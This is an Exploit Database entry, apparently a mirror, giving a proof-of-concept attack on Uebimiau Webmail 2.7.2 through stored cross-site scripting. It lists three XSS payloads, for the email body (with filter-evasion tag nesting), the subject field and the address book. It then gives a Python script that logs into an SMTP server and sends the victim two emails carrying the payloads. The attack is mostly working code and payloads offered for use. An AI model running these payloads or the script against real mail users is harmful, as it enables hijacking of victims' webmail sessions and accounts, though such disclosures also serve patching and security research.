uebimiau webmail 2.7.2 – Persistent Cross-Site Scripting

• Exploit Database
• 38 阅读

• 作者： Shai rod
  日期： 2012-08-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20675/

• #!/usr/bin/python
  
  '''
  # Exploit Title: Uebimiau Webmail Stored XSS
  # Date: 17/08/2012
  # Exploit Author: Shai rod (@NightRang3r)
  # Vendor Homepage: http://www.uebimiau.org/
  # Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
  # Version: 2.7.2
   
  #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar
  
  
  About the Application:
  ======================
  
  Uebimiau is an universal webmail developed in PHP by Aldoir Ventura.
  It is free and can be installed in any email server.
  
  -It runs under any System;
  -It doesn't require any extra PHP modules;
  -Doesn't need a database (as MySQL, PostreSQL,etc)
  -Doesn't need IMAP, but compatible with POP3 and IMAP
  -Compatible with the MIME Standard (send/receive text/html emails);
  -Doesn't need cookies;
  -Easy installation. You only modify one file;
  -Compatible with Apache, PHP, Sendmail or QMAIL;
  -Can be easily translated into any language (already translated in 17 languages);
  -Can use a variety of skins
  
  
  
  
  Vulnerability Description
  =========================
  
  
  1. Stored XSS in e-mail body.
  
  XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>
  
  Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.
  
  
  2. Stored XSS in "Title" field ( works when victim opens message in full view).
  
  XSS Payload: SubjectGoesHere"><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>
  
  This one requires you to send at least 2 messages to the victim with the payload in the email subject.
  
  Location of injection in page source:
  
  <a class="menu" href="https://www.exploit-db.com/exploits/20675/readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" 
  title="Uebimiau Webmail Stored XSS POC "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: 
  <a class="menu" href="javascript:goback()">Back</a> ::
  
  3. Stored XSS in Address Book
  
  XSS Payload: <script>alert("XSS")</script>
  
  Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.
  
  '''
  
  import smtplib
  
  print "###############################################"
  print "#Uebimiau Webmail Stored XSS POC#"
  print "#Coded by: Shai rod #"
  print "# @NightRang3r#"
  print "# http://exploit.co.il#"
  print "# For Educational Purposes Only!#"
  print "###############################################\r\n"
  
  # SETTINGS
  
  sender = "attacker@localhost"
  smtp_login = sender
  smtp_password = "qwe123"
  recipient = "victim@localhost"
  smtp_server= "10.0.0.5"
  smtp_port = 25
  subject = "Uebimiau Webmail Stored XSS POC"
  xss_payload_1 = """ "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>"""
  xss_payload_2 ="""<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
  # SEND E-MAIL
  
  print "[*] Sending E-mail to " + recipient + "..."
  msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
   % (sender, ", ".join(recipient), subject + xss_payload_1) )
  msg += "Content-type: text/html\n\n"
  msg += """Nothing to see here...\r\n"""
  msg += xss_payload_2
  server = smtplib.SMTP(smtp_server, smtp_port)
  server.ehlo()
  server.starttls()
  server.login(smtp_login, smtp_password)
  print "[*] Sending Message 1\r"
  server.sendmail(sender, recipient, msg)
  print "[*] Sending Message 2\r"
  server.sendmail(sender, recipient, msg)
  server.quit()
  print "[+] E-mail sent!"